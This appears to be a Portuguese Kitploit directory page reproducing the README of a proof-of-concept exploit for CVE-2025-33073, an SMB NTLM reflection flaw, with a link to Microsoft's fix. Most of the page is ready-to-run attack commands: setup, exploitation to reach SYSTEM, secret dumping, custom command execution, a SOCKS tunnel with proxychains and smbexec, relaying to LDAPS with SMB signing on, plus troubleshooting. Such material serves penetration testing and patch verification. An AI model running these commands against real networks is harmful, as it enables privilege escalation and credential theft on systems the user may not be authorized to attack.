Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-33073 — Exploit de PoC para a falha de reflexão NTLM do SMB. | Kitploit
Ferramentas/GitHubGitHub/mverschu/cve-2025-33073
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAutenticação
GitHubmverschu/cve-2025-33073

CVE-2025-33073

Exploit de PoC para a falha de reflexão NTLM do SMB.

Ver Repositório
714136há 6 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-33073

PoC de Exploração para a falha de reflexão NTLM no SMB.

imagem

Todos os créditos vão para a pesquisa oficial:
https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Pré-requisitos

SO: Kali Linux (tem a maioria dos pacotes pré-instalados).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (incluído no repositório)

Configuração

A ferramenta usará automaticamente um ambiente virtual. Para configurá-lo, execute:

root@kitploit:~
./setup.sh

Isso criará um ambiente virtual e instalará todas as dependências necessárias, incluindo ldap3-bleeding-edge==2.10.1.1337.

Exemplo de uso

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
imagem

Comando personalizado
Em vez de executar o secretsdump, um comando personalizado pode ser executado.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --custom-command "whoami"

imagem

SOCKS
Para execução de comandos mais furtiva após o estabelecimento de uma conexão válida como SYSTEM. --target e --target-ip devem ser iguais aqui.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --socks

imagem Também é possível executar um comando personalizado através do proxychains em vez de despejar o SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

imagem

Explorar relay para LDAPS mesmo com SMB Signing ativado

Foi realizada uma pesquisa para ver se a reflexão realmente não funcionava com SMB signing ativado, o que resultou na descoberta de bugs onde, se SIGN/SEAL forem removidos do pacote, é possível fazer relay de SMB para LDAPS, o que normalmente não é possível devido ao MIC.

Agradecimentos a:

  • https://github.com/decoder-it/impacket-partial-mic/
  • https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/
  • https://www.depthsecurity.com/blog/using-ntlm-reflection-to-own-active-directory/
root@kitploit:~
python3 CVE-2025-33073.py -u "thewoods.local\test" -p 'pass' -d 192.168.204.131 --dns-ip 192.168.204.133 --dc-fqdn DC01.thewoods.local --target 192.168.204.133 --target-ip 192.168.204.133 -M DFSCoerce --smb-signing
imagem

Exploração manual sem necessidade de DNS

Se você estiver no mesmo domínio de broadcast do dispositivo e ele for vulnerável a envenenamento LLMNR, é possível explorar um dispositivo sem precisar registrar um registro DNS.

imagem

Solução de problemas

  • Já vi o ataque não funcionar às vezes porque o hostname é usado para o ataque, o que resulta em uma consulta DNS a partir do Kali. Se o Kali não estiver usando o servidor DNS ou se você receber uma mensagem '/ FAILED' do impacket-ntlmrelayx, tente adicionar o host ao seu arquivo /etc/hosts. Isso deve fazer o ataque funcionar.
  • Se usar IP, o ataque deve funcionar. Às vezes, executá-lo várias vezes resulta em SUCCESS em vez de falha. Até agora não está perfeitamente claro por que isso acontece. Acho que tem algo a ver com rede.
  • Tente outro método de coação usando -M ou --method.

Wireshark

A autenticação NTLM local ocorre imagem

A autenticação NTLM local não ocorre, resultando em uma tentativa com FAILED imagem

Bom saber

  • O registro DNS também deve ser conhecido pelo cliente; isso pode levar mais tempo em algumas ocasiões. Com mais tempo, quero dizer: dê alguns minutos.
  • Isto é apenas um PoC, o que significa que bypass de AV/EDR não foram tentados. Use por sua conta e risco.

Como corrigir

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Baixar ferramenta